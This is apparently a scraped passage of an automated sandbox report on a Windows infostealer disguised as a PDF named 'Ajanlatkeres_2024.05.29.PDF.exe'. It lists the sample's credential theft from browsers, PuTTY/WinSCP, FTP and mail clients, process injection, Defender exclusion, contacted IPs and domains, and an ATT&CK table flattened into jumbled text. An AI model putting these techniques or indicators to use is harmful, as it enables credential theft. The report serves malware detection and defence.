            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: PopPassword15_2_0040D069
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: SmtpPassword15_2_0040D069
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Shared Modules
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            12
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            2
            Credentials in Registry
            113
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
            Process Injection
            4
            Obfuscated Files or Information
            Security Account Manager231
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture123
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets41
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt712
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448989 Sample: Ajanlatkeres_2024.05.29.PDF.exe Startdate: 29/05/2024 Architecture: WINDOWS Score: 100 48 www.w937xb.com 2->48 50 www.vivaness.club 2->50 52 13 other IPs or domains 2->52 82 Snort IDS alert for network traffic 2->82 84 Found malware configuration 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 16 other signatures 2->88 12 Ajanlatkeres_2024.05.29.PDF.exe 14 5 2->12         started        signatures3 process4 dnsIp5 62 mbsngradnja.com 77.105.36.123, 49709, 80 ORIONTELEKOM-ASRS Serbia 12->62 46 C:\Users\user\AppData\...\YLc7afPlL4RjCeK.exe, PE32 12->46 dropped 106 Writes to foreign memory regions 12->106 108 Allocates memory in foreign processes 12->108 110 Adds a directory exclusion to Windows Defender 12->110 112 Injects a PE file into a foreign processes 12->112 17 YLc7afPlL4RjCeK.exe 4 12->17         started        20 RegSvcs.exe 107 12->20         started        23 powershell.exe 23 12->23         started        file6 signatures7 process8 dnsIp9 64 Antivirus detection for dropped file 17->64 66 Multi AV Scanner detection for dropped file 17->66 68 Machine Learning detection for dropped file 17->68 78 4 other signatures 17->78 25 RegSvcs.exe 17->25         started        28 powershell.exe 23 17->28         started        30 RegSvcs.exe 17->30         started        60 45.61.137.215, 49712, 49714, 49715 AS40676US United States 20->60 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->70 72 Tries to steal Mail credentials (via file registry) 20->72 74 Tries to steal Mail credentials (via file / registry access) 20->74 80 3 other signatures 20->80 76 Loading BitLocker PowerShell Module 23->76 32 conhost.exe 23->32         started        signatures10 process11 signatures12 96 Modifies the context of a thread in another process (thread injection) 25->96 98 Maps a DLL or memory area into another process 25->98 100 Sample uses process hollowing technique 25->100 102 Queues an APC in another process (thread injection) 25->102 34 explorer.exe 25->34 injected 104 Loading BitLocker PowerShell Module 28->104 37 conhost.exe 28->37         started        process13 dnsIp14 54 top-dao.com.lo1069.faipod.com 101.36.116.238, 49792, 80 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 34->54 56 www.imdcaam.com 216.40.34.41, 49727, 80 TUCOWSCA Canada 34->56 58 4 other IPs or domains 34->58 39 chkdsk.exe 34->39         started        process15 signatures16 90 Modifies the context of a thread in another process (thread injection) 39->90 92 Maps a DLL or memory area into another process 39->92 94 Tries to detect virtualization through RDTSC time measurements 39->94 42 cmd.exe 39->42         started        process17 process18 44 conhost.exe 42->44         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Ajanlatkeres_2024.05.29.PDF.exe29%ReversingLabs
            Ajanlatkeres_2024.05.29.PDF.exe100%AviraHEUR/AGEN.1311105
            Ajanlatkeres_2024.05.29.PDF.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
